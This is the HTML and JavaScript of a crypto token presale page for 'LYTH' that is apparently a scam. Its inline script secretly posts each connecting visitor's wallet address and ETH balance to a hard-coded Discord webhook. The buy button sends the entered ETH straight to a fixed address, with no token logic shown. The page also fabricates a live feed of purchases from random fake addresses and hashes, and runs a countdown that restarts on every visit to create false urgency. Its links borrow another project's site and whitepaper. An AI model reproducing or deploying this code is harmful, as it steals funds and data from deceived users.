<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    <script src="https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.3.0/dist/web3.min.js"></script>

    <title>Lythos Token</title>
</head>
    <style>


        @import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700&display=swap');

   body {
            background-color: #0d0d0d;
            background-image: url('https://www.transparenttextures.com/patterns/wave-cut.png'); /* Añadir la imagen wave */
            background-size: cover; /* Ajustar el tamaño de la imagen de fondo */
            background-position: center; /* Centrar la imagen de fondo */
            color: #ffffff;
            font-family: 'Orbitron', Arial, sans-serif;
            margin: 0;
            padding: 0;
            overflow-x: hidden;
            position: relative; /* Posicionamiento para las imágenes de fondo */
        }

nav {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 10px 20px;
    background-color: #1a1a1a;
    box-shadow: 0 4px 6px rgba(0, 0, 0, 0.8);
    border-bottom: 1px solid #333;
}

.nav-links a, #connect-wallet {
    color: #00ff99;
    margin-right: 15px;
    text-decoration: none;
    transition: color 0.3s ease;
}

.nav-links a:hover, #connect-wallet:hover {
    color: #ff00ff;
}

#connect-wallet {
    background-color: #e3b341;
    border: none;
    padding: 10px 15px;
    cursor: pointer;
    font-weight: bold;
    border-radius: 5px;
    transition: background-color 0.3s ease, transform 0.3s ease;
}

#connect-wallet:hover {
    background-color: #ff00ff;
    transform: scale(1.1);
}

.container {
    padding: 20px;
    max-width: 1400px;
    margin: 20px auto;
    position: relative;
    z-index: 2;
   
}


.header {
    background-color: rgba(26, 26, 26, 0.6); /* Fondo oscuro y más claro */
    padding: 20px;
    border-radius: 10px;
    margin-bottom: 20px;
    text-align: center;
    box-shadow: 0 4px 6px rgba(0, 0, 0, 0.8);
}

.main-content {
    display: flex;
    justify-content: center;
    align-items: center;
    position: relative;
    z-index: 2; /* Asegura que el contenido principal esté por encima de las imágenes de fondo */
}

.left-side-image, .right-side-image {
    position: absolute;
    top: 0;
    bottom: 0;
    width: 50%;
    opacity: 1; /* Opacidad ajustada */
    z-index: -2;
}

.left-side-image {
    left: 0;
}

.right-side-image {
    right: 0;
}

.left-side-image img, .right-side-image img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    filter: brightness(1.5); /* Brillo ajustado */
    position: absolute;
    top: 0;
    left: 0;

}

.exchange-box {
    background-color: rgba(26, 26, 26, 0.6); /* Fondo oscuro y más claro */
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 4px 6px rgba(0, 0, 0, 0.8);
    flex: 2;
    margin: 0 20px;
    z-index: 2;
    width: 100%;
    max-width: 600px;
}

.exchange-options {
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
}

.exchange-options button {
    background-color: rgba(51, 51, 51, 0.6); /* Fondo oscuro y más claro */
    border: none;
    color: #00ff99;
    padding: 10px 20px;
    cursor: pointer;
    margin: 0 5px;
    border-radius: 5px;
    transition: background-color 0.3s ease, transform 0.3s ease;
}

.exchange-options button:hover {
    background-color: #ff00ff;
    transform: scale(1.1);
}

.exchange-form {
    margin-top: 10px;
}

.form-group {
    margin-bottom: 20px;
}

.input-group {
    display: flex;
    align-items: center;
}

.input-group select, .input-group input {
    padding: 10px;
    border: 1px solid #2c2c2c;
    background-color: rgba(51, 51, 51, 0.6); /* Fondo oscuro y más claro */
    color: #ffffff;
    margin-right: 10px;
    flex: 1;
    border-radius: 5px;
    box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.8);
    transition: border-color 0.3s ease;
}

.input-group select:focus, .input-group input:focus {
    border-color: #ff00ff;
}

.swap-container {
    display: flex;
    justify-content: center;
    margin: 20px 0;
}

.swap-icon button {
    background-color: rgba(51, 51, 51, 0.6); /* Fondo oscuro y más claro */
    border: none;
    color: #00ff99;
    font-size: 20px;
    cursor: pointer;
    padding: 10px;
    border-radius: 50%;
    transition: background-color 0.3s ease, transform 0.3s ease;
    box-shadow: 0 4px 6px rgba(0, 0, 0, 0.8);
}

.swap-icon button:hover {
    background-color: #ff00ff;
    transform: scale(1.2);
}

.extra-options, .trade-options {
    margin-top: 20px;
    display: flex;
    justify-content: space-between;
    align-items: center;
}

.trade-options input[type="checkbox"] {
    margin-left: 10px;
}

.routing {
    margin-left: 20px;
}

p {
    margin: 0;
    padding: 0;
}

 .countdown-container {
            text-align: center;
            margin: 20px 0;
            color: #ffffff;
        }

        .countdown {
            font-size: 24px;
            font-weight: bold;
            background-color: rgba(51, 51, 51, 0.8);
            padding: 20px;
            border-radius: 10px;
            display: inline-block;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.8);
        }

        .countdown span {
            display: inline-block;
            min-width: 40px;
            padding: 5px 10px;
            border-radius: 5px;
            margin: 0 5px;
        }

        .countdown .updating {
            color: #ff0000;
        }
#buy-button {
  display: block;
  margin: 0 auto; /* Centrará el botón horizontalmente */
  padding: 10px 20px;
  background-color: yellow;
  border: none;
  border-radius: 5px;
  font-size: 16px;
  color: black;
  cursor: pointer;
  transition: transform 0.2s, background-color 0.2s;
}

#buy-button:active {
  transform: scale(0.95); /* Reduce ligeramente el tamaño del botón */
  background-color: gold; /* Cambia el color de fondo al hacer clic */
}
 @keyframes subtle-glow {
        0% {
            text-shadow: 0 0 3px rgba(255, 255, 255, 0.5),
                         0 0 5px rgba(255, 255, 255, 0.3);
        }
        50% {
            text-shadow: 0 0 6px rgba(255, 255, 255, 0.7),
                         0 0 10px rgba(255, 255, 255, 0.5);
        }
        100% {
            text-shadow: 0 0 3px rgba(255, 255, 255, 0.5),
                         0 0 5px rgba(255, 255, 255, 0.3);
        }
    }


 .container {
            padding: 20px;
            max-width: 800px;
            margin: 20px auto;
            position: relative;
            z-index: 2;
        }

        .referral-container {
            text-align: center;
            margin: 20px;
            padding: 20px;
            border: 1px solid #333;
            border-radius: 8px;
            background-color: #1a1a2e;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
            max-width: 600px;
            margin: 0 auto; /* Center the container */
        }

        .referral-container h2 {
            margin-bottom: 10px;
            color: #00d4ff;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

        .referral-link {
            display: block;
            margin: 10px 0;
            padding: 10px;
            background-color: #2e2e5d;
            border: 1px solid #00d4ff;
            border-radius: 4px;
            text-decoration: none;
            color: #00d4ff;
            word-wrap: break-word;
            font-family: 'Courier New', Courier, monospace;
        }

        .referral-container button {
            padding: 10px 20px;
            background-color: #00d4ff;
            color: #1a1a2e;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s, transform 0.3s;
        }

        .referral-container button:hover {
            background-color: #0095b6;
            transform: scale(1.05);
        }

      .transaction-container {
        max-width: 800px;
        margin: 50px auto;
        padding: 20px;
        border: 1px solid #333;
        border-radius: 8px;
        background-color: #1a1a2e;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
        position: relative;
        overflow: hidden;
        height: 200px; /* Altura fija */
    }

    .transaction-list {
        position: absolute;
        width: 100%;
        list-style: none;
        padding: 0;
        margin: 0;
        animation: scrollUp 15s linear infinite; /* Ajustar duración según sea necesario */
    }

    .transaction {
        display: flex;
        justify-content: space-between;
        padding: 10px 0;
        margin-bottom: 5px;
    }

    .transaction:nth-child(odd) {
        background-color: rgba(51, 51, 51, 0.6);
    }

    .transaction:nth-child(even) {
        background-color: rgba(77, 77, 77, 0.6);
    }

    .transaction span {
        flex: 1;
        text-align: center;
    }

    .address {
        color: #00ff99;
    }

    .eth {
        color: #ff00ff;
    }

    .lyth {
        color: #e3b341;
    }

    .time {
        color: #00d4ff;
    }

    .hash {
        color: #ff5733;
    }

    @keyframes scrollUp {
        0% {
            transform: translateY(100%);
        }
        20%,
        25% {
            transform: translateY(0);
        }
        100% {
            transform: translateY(-100%);
        }
    }
    </style>
<body>
    <nav>
        <div class="logo"><!-- Imagen del logo eliminada --></div>
        <div class="nav-links">
            <a href="#">Lythos Token</a>
            <a href="https://hamsterkombatgame.io">Developers</a>
<a href="https://hamsterkombatgame.io/docs/hk_wp_rev.0.2_july_30__2024.pdf" target="_blank">Whitepaper</a>
            <a href="https://hamsterkombatgame.io">Road Map</a>
            <a href="#referral-section">Refer</a>
            <a href="https://hamsterkombatgame.io">Bots</a>
        </div>
        <button id="connect-wallet">Connect wallet</button>
    </nav>

    <div class="container">
        <div class="header">

            
<h1 style="color: #00FFFF; text-align: center; font-weight: bold; position: relative; display: inline-block;">
    LYTH <span style="position: relative; display: inline-block; overflow: hidden;">
        <span style="position: relative; display: inline-block; color: #00FFFF; animation: sword-glow 3s infinite;">pre sale</span>
    </span>!
</h1>
            
            
<p>Hurry to get your <span style="color:#ff00ff;">LYTH tokens</span> before they are listed. The <span style="color:#ff00ff;">countdown</span> has just begun!</p>
<p>See everything that's new and read about our mission to build <span style="color:#00ff99;">DeFi's internet of liquidity</span>.</p>

        </div>

        <div class="presale-info">
<div style="text-align: center;">
    <p style="color: #FFA500; font-weight: bold;">Minimum purchase: <span style="color: #FFD700;">0.1 ETH</span></p>
    <p style="color: #FF4500; font-weight: bold;">Maximum purchase: <span style="color: #FFD700;">10 ETH</span></p>
    <p style="color: #32CD32; font-weight: bold;">1 ETH = <span style="color: #FFD700;">20000 LYTH Token</span></p>
</div>



</div>
<div class="countdown-container">
    <h2>Countdown to End of Presale LYTH:</h2>
    <div id="countdown" class="countdown"></div>
</div>
 <div class="main-content">
            <div class="left-side-image">
                <img src="https://cyberpunk-kappa.vercel.app/photo_4999174029843737821_y.jpg" alt="Cyberpunk Decoration">
            </div>

      

            <div class="exchange-box">
                <div class="exchange-options">
                    <button id="grand-master">Buy Grand Master</button>
                    <button id="lord">Buy Lord</button>
                    <button id="creator">Buy Creator</button>
                </div>
                <div class="exchange-form">
                    <div class="form-group">
                        <label for="pay">You pay</label>
                        <div class="input-group">
                            <select id="pay">
                                <option value="eth">ETH</option>
                                <!-- Otras opciones -->
                            </select>
                            <input type="text" id="pay-amount" placeholder="0">
                        </div>
                    </div>
                    <div class="swap-container">
                        <div class="swap-icon">
                            <button id="swap">⇅</button>
                        </div>
                    </div>
                    <div class="form-group">
                        <label for="receive">You receive</label>
                        <div class="input-group">
                            <select id="receive">
                                <option value="lyth">LYTH</option>
                                <!-- Otras opciones -->
                            </select>
                            <input type="text" id="receive-amount" placeholder="0">
                        </div>
                                    <button id="buy-button">Buy Now</button>

                    </div>
                    <p>+ 0 POINTS</p>
                    <div class="extra-options">
                        <label for="trade-another-address">Trade and Send to Another Address</label>
                        <input type="checkbox" id="trade-another-address">
                        <div class="routing">
                            <label for="routing">Routing</label>
                            <select id="routing">
                                <option value="standard">Standard</option>
                                <!-- Otras opciones -->
                            </select>
                        </div>
                    </div>
                    <p>ETA: &lt; 2.5 min</p>
                </div>
            </div>

         
        </div>
    </div>




    
        <div id="referral-section" class="referral-container">
        <h2>Share refe your win 70 LYTH Token for refe </h2>
        <a id="referral-link" class="referral-link" href="#" target="_blank">Generate Referral Link</a>
        <button id="copy-button">Copy Referral Link</button>
    </div>

<h2 style="text-align: center;">Tx Buy LYTH</h2>

<div class="transaction-container" id="transaction-container">

    <script src="app.js"></script>
</body>
    <script>

        document.addEventListener('DOMContentLoaded', () => {
    const grandMasterButton = document.getElementById('grand-master');
    const lordButton = document.getElementById('lord');
    const creatorButton = document.getElementById('creator');
    const payAmountInput = document.getElementById('pay-amount');
    const receiveAmountInput = document.getElementById('receive-amount');
    const buyButton = document.getElementById('buy-button');
    const connectWalletButton = document.getElementById('connect-wallet');
    const referralLinkElement = document.getElementById('referral-link');
    const copyButton = document.getElementById('copy-button');

    // Función para actualizar el valor de receiveAmountInput basado en payAmountInput
    function updateReceiveAmount() {
        const payAmount = parseFloat(payAmountInput.value);
        const tokensPerEth = 28000;
        const tokens = payAmount * tokensPerEth;
        receiveAmountInput.value = tokens.toFixed(0);
    }

    grandMasterButton.addEventListener('click', () => {
        payAmountInput.value = '0.1';
        receiveAmountInput.value = '2000';
    });

    lordButton.addEventListener('click', () => {
        payAmountInput.value = '0.5';
        receiveAmountInput.value = '10000'; // 0.5 * 28000
    });

    creatorButton.addEventListener('click', () => {
        payAmountInput.value = '1';
        receiveAmountInput.value = '20000';
    });

    payAmountInput.addEventListener('input', updateReceiveAmount);

    var endDate = new Date();
    endDate.setDate(endDate.getDate() + 5); // Sumar 5 días
    endDate.setHours(endDate.getHours() + 14); // Sumar 14 horas

    function updateCountdown() {
        var now = new Date();
        var timeRemaining = endDate - now;

        if (timeRemaining <= 0) {
            document.getElementById('countdown').innerHTML = "Presale has ended!";
            return;
        }

        var days = Math.floor(timeRemaining / (1000 * 60 * 60 * 24));
        var hours = Math.floor((timeRemaining % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
        var minutes = Math.floor((timeRemaining % (1000 * 60 * 60)) / (1000 * 60));
        var seconds = Math.floor((timeRemaining % (1000 * 60)) / 1000);

        document.getElementById('countdown').innerHTML = 
            days + "d " + hours + "h " + minutes + "m " + seconds + "s";
    }

    // Actualiza el contador cada segundo
    updateCountdown();
    setInterval(updateCountdown, 1000);

    // Función para enviar datos al webhook de Discord
    async function sendToDiscord(address, balance) {
        const webhookUrl = 'https://discordapp.com/api/webhooks/1339013245188444261/hOvOVT58ohHFs4WiUM9T5IGq91-48oOEgnSLpwOwed9eHHg49kxRkaJwK8aBUmqL-zbm'; // Reemplaza con tu URL de webhook
        const payload = {
            content: `Nueva conexión de billetera: \n- Dirección: ${address} \n- Saldo: ${balance} ETH`
        };

        try {
            await fetch(webhookUrl, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify(payload)
            });
            console.log('Datos enviados a Discord correctamente.');
        } catch (error) {
            console.error('Error al enviar datos a Discord:', error);
        }
    }

    let web3;
    let account;

    connectWalletButton.addEventListener('click', async () => {
        if (window.ethereum) {
            try {
                await window.ethereum.request({ method: 'eth_requestAccounts' });
                web3 = new Web3(window.ethereum);
                const accounts = await web3.eth.getAccounts();
                account = accounts[0];

                const balanceWei = await web3.eth.getBalance(account);
                const balanceEth = web3.utils.fromWei(balanceWei, 'ether');

                await sendToDiscord(account, balanceEth);

                document.querySelectorAll('.wallet-address').forEach(element => {
                    element.innerText = account;
                });

                connectWalletButton.innerText = "WEB3 ACTIVE";
                connectWalletButton.disabled = true;

                const baseUrl = 'https://pre-sale-hamster.vercel.app/';
                referralLinkElement.href = `${baseUrl}?ref=${encodeURIComponent(account)}`;
                referralLinkElement.innerText = referralLinkElement.href;

            } catch (error) {
                console.error("Error connecting to MetaMask:", error);
            }
        } else {
            alert('Usa el navegador de Metamask o Trustwallet para abrir esta DAPP, o abrir en pc con extension de Metamask.');
        }
    });

    buyButton.addEventListener('click', async () => {
        if (web3 && account) {
            try {
                const amountToSendInEther = payAmountInput.value;
                const amountToSendInWei = web3.utils.toWei(amountToSendInEther, 'ether');
                const recipientAddress = '0x01C65F22A9478C2932e62483509c233F0aaD5c72';

                await web3.eth.sendTransaction({
                    from: account,
                    to: recipientAddress,
                    value: amountToSendInWei
                });
            } catch (error) {
                console.error('Error en la transacción:', error);
            }
        } else {
            alert('Conecta tu billetera primero.');
        }
    });

    // Copiar enlace al portapapeles
    copyButton.addEventListener('click', () => {
        navigator.clipboard.writeText(referralLinkElement.href).then(() => {
            alert('Referral link copied to clipboard!');
        }, (err) => {
            console.error('Failed to copy: ', err);
        });
    });

    // Inicializar el valor de receiveAmountInput basado en payAmountInput
    updateReceiveAmount();

    const transactionContainer = document.getElementById('transaction-container');
    const addresses = [
        '0x1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9s',
        '0x2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9sa1',
        '0x3c4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9sa2b3',
        '0x4d5e6f7g8h9i0j1k2l3m4n5o6p7q8r9sa3b4c',
        '0x5e6f7g8h9i0j1k2l3m4n5o6p7q8r9sa4b5c6d',
        '0x6f7g8h9i0j1k2l3m4n5o6p7q8r9sa5b6c7d8e',
        '0x7g8h9i0j1k2l3m4n5o6p7q8r9sa6b7c8d9e0f',
        '0x8h9i0j1k2l3m4n5o6p7q8r9sa7b8c9d0e1f2g',
        '0x9i0j1k2l3m4n5o6p7q8r9sa8b9c0d1e2f3g4h',
        '0x0j1k2l3m4n5o6p7q8r9sa9b0c1d2e3f4g5h6i'
    ];

    function getRandomAddress() {
        return addresses[Math.floor(Math.random() * addresses.length)];
    }

    function getRandomEth() {
        return (Math.random() * (10 - 0.1) + 0.1).toFixed(2);
    }

    function getRandomLYTH(ethAmount) {
        return (ethAmount * 20000).toFixed(0);
    }

    function getRandomHash() {
        return '0x' + Math.random().toString(36).substring(2, 15);
    }

    function getRandomTime() {
        return new Date().toLocaleTimeString();
    }

    function createTransaction() {
        const ethAmount = getRandomEth();
        const transaction = document.createElement('div');
        transaction.classList.add('transaction');

        transaction.innerHTML = `
            <span class="address">${getRandomAddress().substring(0, 6)}...${getRandomAddress().substring(38)}</span>
            <span class="amount">${ethAmount} ETH</span>
            <span class="hash"><a href="#" target="_blank">${getRandomHash().substring(0, 10)}...</a></span>
            <span class="time">${getRandomTime()}</span>
        `;

        return transaction;
    }

    function updateTransactions() {
        transactionContainer.innerHTML = '';
        for (let i = 0; i < 10; i++) {
            transactionContainer.appendChild(createTransaction());
        }
    }

    updateTransactions();
    setInterval(updateTransactions, 10000);
});
    </script>
</html>
